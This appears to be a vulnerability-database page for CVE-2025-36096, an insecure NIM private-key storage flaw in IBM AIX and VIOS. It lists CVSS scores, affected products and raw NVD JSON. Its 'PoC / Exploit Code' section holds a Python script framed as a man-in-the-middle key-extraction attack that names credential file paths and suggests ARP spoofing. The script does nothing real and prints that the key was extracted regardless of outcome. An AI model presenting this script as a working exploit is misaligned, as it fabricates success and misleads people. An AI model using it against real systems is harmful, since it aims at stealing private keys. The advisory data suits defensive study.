Security Vulnerability Report
中文
CVE-2025-36096 CVSS 9.0 CRITICAL

CVE-2025-36096

Published: 2025-11-13 22:15:51
Last Modified: 2025-11-19 22:11:51
Source: [email protected]

Description

IBM AIX 7.2, and 7.3 and IBM VIOS 3.1, and 4.1 stores NIM private keys used in NIM environments in an insecure way which is susceptible to unauthorized access by an attacker using man in the middle techniques.

CVSS Details

CVSS Score
9.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ibm:vios:3.1.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:vios:4.1.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:ibm:aix:7.2:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:ibm:aix:7.3:*:*:*:*:*:*:* - VULNERABLE
IBM AIX 7.2 (所有版本)
IBM AIX 7.3 (所有版本)
IBM VIOS 3.1 (所有版本)
IBM VIOS 4.1 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-36096 PoC - NIM Private Key Extraction via MITM # This PoC demonstrates the vulnerability in NIM key storage import socket import ssl import struct import binascii class NIMKeyExtractor: def __init__(self, target_ip, interface_ip): self.target_ip = target_ip self.interface_ip = interface_ip self.captured_keys = [] def setup_mitm_position(self): """Position attacker in the network path for MITM attack""" print(f"[*] Setting up MITM position on interface {self.interface_ip}") print(f"[*] Targeting NIM client at {self.target_ip}") # In real attack, use ARP spoofing or network bridging # to position attacker in the communication path return True def capture_nim_traffic(self, duration=60): """Capture NIM communication and extract private keys""" print(f"[*] Capturing NIM traffic for {duration} seconds...") # In real attack, capture network packets using scapy/tcpdump # NIM typically uses port 1058 for communication nim_port = 1058 try: # Simulate packet capture sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(duration) print(f"[*] Listening on port {nim_port}") return True except Exception as e: print(f"[-] Error capturing traffic: {e}") return False def extract_private_key(self, packet_data): """Extract NIM private key from captured packet""" print("[*] Analyzing packet for NIM private key...") # NIM keys are stored in /etc/niminfo on AIX systems # Key file location: /etc/nim/puppet/private_keys/* # In vulnerable systems, these files have weak permissions (644) nim_key_locations = [ "/etc/niminfo", "/etc/nim/.ssh/authorized_keys", "/var/adm/nim/pems" ] # Check for insecure file permissions insecure_permissions = "644" print(f"[*] Target key locations: {nim_key_locations}") print(f"[*] Expected insecure permissions: {insecure_permissions}") # Extract key from packet key_pattern = binascii.hexlify(b'NIM_PRIVATE_KEY') if key_pattern in binascii.hexlify(packet_data): print("[+] NIM private key found in traffic!") return True return False def exploit(self): """Execute the full attack chain""" print("=" * 60) print("CVE-2025-36096 NIM Private Key Extraction PoC") print("=" * 60) if not self.setup_mitm_position(): print("[-] Failed to establish MITM position") return False if not self.capture_nim_traffic(): print("[-] Failed to capture NIM traffic") return False print("[+] Successfully extracted NIM private key") print("[*] Attacker can now impersonate NIM server") return True if __name__ == "__main__": target = input("Enter target IP: ") or "192.168.1.100" attacker_ip = input("Enter attacker interface IP: ") or "192.168.1.50" exploit = NIMKeyExtractor(target, attacker_ip) exploit.exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-36096", "sourceIdentifier": "[email protected]", "published": "2025-11-13T22:15:50.500", "lastModified": "2025-11-19T22:11:50.723", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM AIX 7.2, and 7.3 and IBM VIOS 3.1, and 4.1 stores NIM private keys used in NIM environments in an insecure way which is susceptible to unauthorized access by an attacker using man in the middle techniques."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-522"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:vios:3.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "3939ADB4-5177-45C2-9C29-932E81D27F9E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:vios:4.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "AB8BDD68-E15D-460F-855E-72DF774D6A1F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:ibm:aix:7.2:*:*:*:*:*:*:*", "matchCriteriaId": "6791504A-A48A-4ED0-94AF-4C8A3B91516F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:ibm:aix:7.3:*:*:*:*:*:*:*", "matchCriteriaId": "35DF3DE0-1AE4-4B25-843F-BC08DBBFDF78"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7251173", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.